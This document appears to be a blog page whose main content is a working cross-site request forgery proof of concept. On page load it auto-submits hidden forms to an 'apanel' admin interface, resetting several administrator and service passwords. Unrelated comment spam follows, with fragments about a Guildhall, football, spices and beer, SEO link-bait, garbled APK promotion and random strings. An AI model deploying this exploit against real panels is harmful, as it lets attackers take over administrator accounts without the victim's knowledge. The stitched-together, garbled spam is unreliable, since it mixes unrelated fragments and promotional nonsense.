PoC:
<html>
<head>
<script type="text/javascript">
window.onload = function() {
var url = 'http://localhost/apanel';
var xsrs = [
{
"action": url + "/apsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "apuser", "value": "new_username" },
{ "name": "appass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/psetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/sslpsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/mqsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "qpass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
}
];
for (var x = 0; x < xsrs.length; x++) {
var attackFrame = document.createElement('iframe');
var html = '<html><body><form action="' + xsrs[x].action + '" ' +
'method="' + xsrs[x].method + '">';
for (var y = 0; y < xsrs[x].fields.length; y++) {
html += '<input type="' +
(xsrs[x].fields[y].type != null ?
xsrs[x].fields[y].type : 'hidden') + '" ' +
'name="' + xsrs[x].fields[y].name + '" ' +
'value="' + xsrs[x].fields[y].value + '" />';
}
html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';
document.body.appendChild(attackFrame);
attackFrame.contentDocument.write(html);
}
}
</script>
</head>
<body>
</body>
</html>
The Guildhall cost between £400–£500 to build.[15] (As it was built primarily using pressed labour, modern equivalents of the building costs are virtually meaningless. The annual income of the city council at the time the Guildhall was built was around £120.[15]) The eastern face of the Guildhall was built in a distinctive black and white checked design, representing the exchequer.
ReplyDeletecake topper
Catering Atlanta
The ten outfield players may be arranged in any combination. The number of players in each position determines the style of the team's play; more forwards and fewer defenders creates a more aggressive and offensive-minded game, while the reverse creates a slower, more defensive style of play. While players typically spend most of the game in a specific position, there are few restrictions on player movement, and players can switch positions at any time.[14] The layout of a team's players is known as a formation. Defining the team's formation and tactics is usually the prerogative of the team's manager.
ReplyDeletecash advances
custom website development
In this world, Indian cuisines are one of the most diverse; they are famous for their distinct and flavorful spices. There are around 80 cookies spices and pepper, fenugreek, turmeric, fennel, chili, ginger, clove, celery, cardamom, cumin, cassia and others. There are various methodology and techniques by which spices are grown.
ReplyDeletepersian rugs
hvac repair nyc
Different regions have water with different mineral components. As a result, different regions are better suited to making certain types of beer.
ReplyDeleteon hold players
non profit fundraiser
Baidu Root was mixcloud.com launched in China, but this app More Info has a English version so if Install Baidu Root on PC you don't understand Chinese you do not have Baidu Root APK to stress over how you can utilize Baidu Root it and you will certainly give root access.
ReplyDeletemore right from your Android mobile totally free.Mobdro Presently, Mobdro library has video clips to Refer captivate the people. You can Mobdro APK either stream these videos online.
ReplyDeletef6f89a4j94 y1r65p0w18 x6v08n4k80 w8j54n5a75 r2q53w8s62 v6q89m9n18
ReplyDelete